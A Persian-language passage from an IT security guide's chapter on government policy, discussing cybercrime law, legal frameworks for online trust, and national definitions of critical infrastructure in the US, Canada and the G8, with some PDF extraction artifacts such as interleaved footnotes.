‫ﻫﻤﻜﺎﺭﻱ‪ ،‬ﻧﻘﻄﻪ ﺗﻌﺎﺩﻟﻲ ﺑﻪ ﻗﺮﺍﺭ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪:‬‬
‫•‬
‫‪۴‬‬
‫ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻛﺎﺭ ﻛﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺴﻮﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺗﺮﻏﻴﺐ ﻣﻲﻛﻨﺪ ﺗـﺎ ﺳـﻮﺩ ﺑﻴـﺸﺘﺮﻱ‬
‫ﻛﺴﺐ ﻛﻨﻨﺪ؛‬
‫ﻼ ﺟﺪﻳـﺪ ﺍﺳـﺖ‪ ،‬ﻭ‬
‫ﺩﺭ ﺑﻌﻀﻲ ﻛﺸﻮﺭﻫﺎ ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﻣﺴﺌﻠﻪﺍﻱ ﻛـﺎﻣ ﹰ‬
‫ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨـﺎ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ‪ ،‬ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ‪ ،‬ﻭ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ‬
‫ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺑــﺎ ﻃﻴــﻒ ﻛــﺎﻣﻠﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺳــﻨﺘﻲ ﻣــﺮﺗﺒﻂ ﺑــﺎ‬
‫ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﺩﺳﺖ ﺑﻪ ﮔﺮﻳﺒﺎﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺘﺎﺯﮔﻲ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﻧﻴﺰ‬
‫ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٣٢‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﺩﻭﻟﺘﻲ ﻭ ﺁﮔﺎﻩﺳﺎﺯﻱ؛‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﻨﺪ؛‬
‫ﻣﻔﺎﻫﻴﻢ ﻗﻮﺍﻧﻴﻦ ﺳﻨﺘﻲ ﻛﻪ ﻭﺍﺭﺩ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ؛ ﻭ‬
‫ﻗﻮﺍﻧﻴﻦ‪ ،‬ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺑـﺮ‬
‫ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻤﺮﻛﺰ ﻳﺎﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﻣﻔﻬﻮﻡ "ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ" ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺟﺰﺋﻲ ﺍﺯ ﻣﻮﺿـﻮﻉ‬
‫ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﺑﻪ ﻧﺎﻡ "ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﺩﺭ ﮔﺴﺘﺮﺵ ﺍﻋﺘﻤﺎﺩ ﺍﻳﻨﺘﺮﻧﺘـﻲ"‬
‫ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ‪ .‬ﺍﻳﺠﺎﺩ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺳﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨﺪ ﺗﻄﺒﻴﻖ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎ‬
‫ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺯﻣﻴﻨـﻪﻫـﺎ ﺷـﺎﻣﻞ ﺣﻤﺎﻳـﺖ ﺍﺯ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﻩ‪ ،٥‬ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،٦‬ﺣﻘـﻮﻕ‬
‫ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ‪ ٧‬ﻭ ﭼﺎﺭﭼﻮﺏ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٨‬ﻣﻲﺑﺎﺷـﺪ‪ .‬ﺩﺭ‬
‫ﺩﻧﻴــﺎﻱ ﺑــﺪﻭﻥ ﺍﻳﻨﺘﺮﻧــﺖ‪ ،‬ﻗــﺎﻧﻮﻥ ﺑــﺮﺍﻱ ﻣﻌــﺎﻣﻼﺕ ﺗﺠــﺎﺭﻱ ﻭ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺣﻤﺎﻳﺘﻬﺎﻳﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ‬
‫ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻗﺎﺑـﻞ ﺍﻋﻤـﺎﻝ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺪﻧﺒﺎﻝ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫)‪ (ICT‬ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﺁﻳﺎ ﺩﺭ ﻗﻮﺍﻧﻴﻦ‬
‫ﺁﻧﻬﺎ ﺧﻸﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺎﻧﻊ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﻻﺯﻡ ﺑـﺮﺍﻱ‬
‫ﺍﻓــﺰﺍﻳﺶ ﺍﻣﻨﻴــﺖ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﺷــﻮﺩ ﻳــﺎ ﺧﻴــﺮ‪ .‬ﺩﺭ ﺣﻘﻴﻘــﺖ‬
‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﻋﻼﻗﻪﻣﻨﺪ ﺑـﻪ ﮔـﺴﺘﺮﺵ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﺑﻨﺪ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﺁﻧﻬـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ‪ ،‬ﻣﺎﻟﻜﻴﺖ ﺳﺎﻳﺒﺮ ﻭ ﺣﻤﺎﻳﺖ ﺍﺯ ﻣـﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ ﺍﻋﺘﻤـﺎﺩ ﻳـﺎ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻌﺎﻣﻼﺕ ﺧﺎﺭﺝ ﺍﺯ ﺩﻧﻴﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ‬
‫ﻧﻴﺴﺖ‪ .‬ﺍﺻﻼﺡ ﻗﻮﺍﻧﻴﻦ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ‬
‫ﺍﺯ ﺍﺻﻼﺣﺎﺕ ﺭﻭﻱ ﻗﻮﺍﻧﻴﻦ ﻛﻠﻲﺗﺮ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺗﻤﺮﻛﺰ ﺍﻳﻦ ﻛﺘـﺎﺏ‬
‫ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ‬
‫ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡﺷـﺪﻩ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ‬
‫)ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﻭ ﻧﻴﺰ ﺿﻤﺎﺋﻢ ﺫﻛﺮ ﺷﺪﻩﺍﻧـﺪ( ﻭ ﺳـﺆﺍﻻﺕ ﺩﺭ‬
‫ﭼﺎﺭﭼﻮﺏ ﻋﻤﻠﻜـﺮﺩ ﻭﺳـﻴﻌﺘﺮ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ‬
‫‪٩‬‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻭﺍﮔﺬﺍﺭ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪٩‬‬
‫‪Consumer Protection‬‬
‫‪Data & Communications Privacy‬‬
‫‪Intellectual Property Rights‬‬
‫‪E-Commerce Framework‬‬
‫ﺩﺭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻭﻟﻴﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﻳﻚ ﺑﺨﺶ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﻃﻴـﻒ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑﺮ ﺗﻮﺳﻌﺔ ‪ ICT‬ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪5‬‬
‫‪6‬‬
‫‪7‬‬
‫‪8‬‬
‫ﺍﻳﻦ ﺑﺨﺶ ﻋﻼﻭﻩ ﺑـﺮ ﺗﻮﺿـﻴﺢ ﻣﻘـﺪﻣﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ ،‬ﺑﻪ ﺷﺮﺡ ﺟﺰﺋﻴﺎﺕ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﻣﻄﺎﺑﻖ ﻗﻮﺍﻧﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﭼﻨﺪﻣﻠﻴﺘﻲ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﻧﻜﺎﺕ ﻣﻄـﺮﺡ ﺷـﺪﻩ ﺑـﺎ ﺩﻗـﺖ‬
‫ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻤﺮﻛﺰ ﺑـﺮ ﻣﻨـﺎﺑﻊ ﻭ‬
‫ﻣﺪﻟﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻣﺮﺍﻛﺰ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻧﺒﺎﻳﺪ ﺳـﺎﻳﺮ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻣﻄﺎﻟﻌـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ‬
‫ﺑﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪،‬‬
‫‪١٠‬‬
‫ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﭼﺎﺭﭼﻮﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺧﻮﺩ ﺑﺮﮔﺰﻳﻨﻨﺪ‪ .‬ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ‪ ،‬ﻣﺘﻔـﺎﻭﺕ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺎ ﺍﻳﻦ‬
‫ﻣﻮﺿﻮﻉ ﺑﺮﺧﻮﺭﺩ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺻﻮﻝ ﮔﻔﺘـﻪﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺠـﺎ ﻛـﺎﺭﺑﺮﺩ‬
‫ﺟﻬﺎﻧﻲ ﺩﺍﺭﺩ‪ .‬ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷـﺖ ﻛـﻪ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻛﺸﻮﺭﻫﺎ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‬
‫ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺸﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﻣـﺸﻜﻼﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ‪ ١١‬ﻧـﺎﻡ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ‪.‬‬
‫ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ‪ ،‬ﺷــﺒﻜﻪﺍﻱ ﺍﺯ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺍﻗﺘـﺼﺎﺩ ﻳـﺎ ﺭﻓـﺎﻩ ﻳـﻚ‬
‫ﻛﺸﻮﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺷﺒﻜﺔ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ‬
‫ﺣﻴﺎﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺷـﺎﻣﻞ ﺗﻤـﺎﻣﻲ ﺑﺎﻧﻜﻬـﺎﻱ ﺧـﺼﻮﺻﻲ‪ ،‬ﺑﺎﻧـﻚ‬
‫ﻣﺮﻛﺰﻱ‪ ،‬ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺒﺎﺩﻻﺕ ﻛﺎﻻ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﺒـﺎﺩﻝ ﭼـﻚ‪ ،‬ﻭ‬
‫ﺩﻳﮕﺮ ﻧﻬﺎﺩﻫﺎﻳﻲ ﻛﻪ ﺩﺭﮔﻴـﺮ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﻫـﺴﺘﻨﺪ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬـﺎﻥ ﺍﻳـﻦ ﻋﻤﻠﻴـﺎﺕ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴـﺮﺩ‪ .‬ﺷـﺒﻜﺔ ﺣﻤـﻞ ﻭ ﻧﻘـﻞ ﻧﻴـﺰ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﺣﻴﺎﺗﻲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺟـﺎﺩﻩﻫـﺎ‪ ،‬ﭘﻠﻬـﺎ‪ ،‬ﻛﺎﻧﺎﻟﻬـﺎ‪،‬‬
‫ﺧﻄﻮﻁ ﺭﺍﻩﺁﻫﻦ ﻭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺯﻳﺮﺳـﺎﺧﺖ‬
‫ﺣﻤﻞ ﻭ ﻧﻘﻞ ﻏﺎﻟﺒـﹰﺎ ﻓﻴﺰﻳﻜـﻲ ﻭ ﻣﻜـﺎﻧﻴﻜﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺻﺤﻴﺢ ﭼﺮﺍﻏﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻳﻲ‪ ،‬ﺑﺎﺯ ﻭ ﺑﺴﺘﻪ ﻛﺮﺩﻥ ﭘﻠﻬﺎ‪ ،‬ﺭﺍﻩﺍﻧﺪﺍﺧﺘﻦ‬
‫ﻗﻄﺎﺭﻫﺎ ﻭ ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴـﻚ ﻫـﻮﺍﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺑـﻪ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺻﺤﻴﺢ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻫﻴﭻ ﺗﻌﺮﻳﻒ ﻣﺸﺨﺼﻲ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬـﺎﻱ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ‬
‫ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻭ ﻓﻬﺮﺳــﺖ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﻛــﻪ ﺗﻮﺳــﻂ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻭ ﺍﺯ‬
‫‪E-Security‬‬
‫‪Critical Infrastructures‬‬
‫‪10‬‬
‫‪11‬‬
‫‪٢٣٣‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺯﻣﺎﻧﻲ ﺗﺎ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ‪ .‬ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﺓ ﺁﻣﺮﻳﻜﺎ ﻛﻪ ﺩﺭ ﻓﻮﺭﻳﻪ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺑﻪ ﭼـﺎﭖ‬
‫ﺭﺳــﻴﺪ‪ ۱۳ ،‬ﮔــﺮﻭﻩ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﺭﺍ ﻣــﺸﺨﺺ ﻣــﻲﺳــﺎﺯﺩ‪:‬‬
‫‪ (۱‬ﻛﺸـــﺎﻭﺭﺯﻱ‪ (۲ ،‬ﺗﻐـــﺬﻳﻪ‪ (۳ ،‬ﺁﺏ‪ (۴ ،‬ﺑﻬﺪﺍﺷـﺖ ﻋﻤـﻮﻣﻲ‪،‬‬
‫‪ (۵‬ﺧـــﺪﻣﺎﺕ ﺍﺿـــﻄﺮﺍﺭﻱ‪ (۶ ،‬ﺩﻭﻟـــﺖ‪ (۷ ،‬ﺻـــﻨﺎﻳﻊ ﺩﻓـــﺎﻋﻲ‪،‬‬
‫‪ (۸‬ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻩ ﺩﻭﺭ‪ (۹ ،‬ﺍﻧﺮﮊﻱ‪ (۱۰ ،‬ﺣﻤﻞ ﻭ ﻧﻘـﻞ‪،‬‬
‫‪ (۱۱‬ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺍﻣﻮﺭ ﻣﺎﻟﻲ‪ (۱۲ ،‬ﻣـﻮﺍﺩ ﺷـﻴﻤﻴﺎﻳﻲ ﻭ ﭘﺮﺧﻄـﺮ‪ ،‬ﻭ‬
‫‪ (۱۳‬ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﻭ ﻛﺸﺘﻴﺮﺍﻧﻲ‪ ١٢.‬ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ‬
‫ﺷﺪﻩ‪ ،‬ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﺎﻧـﺎﺩﺍ ﺗﻨﻬـﺎ ﺍﺯ‬
‫ﺷﺶ ﮔﺮﻭﻩ ﻧﺎﻡ ﻣﻲﺑﺮﺩ‪ (۱ :‬ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ (۲ ،‬ﺩﻭﻟـﺖ‪ (۳ ،‬ﺍﻧـﺮﮊﻱ ﻭ‬
‫ﺻﻨﺎﻳﻊ ﻫﻤﮕﺎﻧﻲ‪ (۴ ،‬ﺧﺪﻣﺎﺕ )ﻛـﻪ ﺩﺭ ﻛﺎﻧـﺎﺩﺍ ﺷـﺎﻣﻞ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪،‬‬
‫‪١٣‬‬
‫ﺗﻮﺯﻳﻊ ﻏﺬﺍ‪ ،‬ﻭ ﺑﻬﺪﺍﺷـﺖ ﺍﺳـﺖ(‪ (۵ ،‬ﺍﻣﻨﻴـﺖ‪ ،‬ﻭ ‪ (۶‬ﺣﻤـﻞ ﻭ ﻧﻘـﻞ‪.‬‬
‫ﺗﻌﺮﻳﻒ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ‪ ،‬ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺩﺭﻙ‬
‫‪١٤‬‬
‫ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‪ ،‬ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻧﻴﺴﺖ‪.‬‬
‫‪The National Strategy to Secure Cyberspace‬‬
‫]‪[U.S.‬‬
‫‪http://www.whitehouse.gov/pcipb‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪nal_Cyberspace_Strategy.pdf‬‬
‫& ‪Office of Critical Infrastructure Protection‬‬
‫]‪Emergency Prepareness [Canada‬‬
‫‪http://www.ocipep.gc.ca/home/index_e.asp‬‬
‫‪۱۴‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﭘﻴﺸﻘﺪﻡ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ‬
‫ﻛﻪ ﺩﺭ ﻣﻘﻴﺎﺱ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﮔﺮﻭﻩ ‪G8‬ﺩﺭ ﻣﺎﻩ ﻣـﻲ ﺳـﺎﻝ ‪ ۱۱ ، ۲۰۰۳‬ﺍﺻـﻞ ﺭﺍ‬
‫ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﺗﻮﺳـﻌﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ١٦.‬ﺍﻳﻦ ﺍﺻـﻮﻝ‬
‫ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪.۱‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪﺓ ﺍﺿـﻄﺮﺍﺭﻱ‬
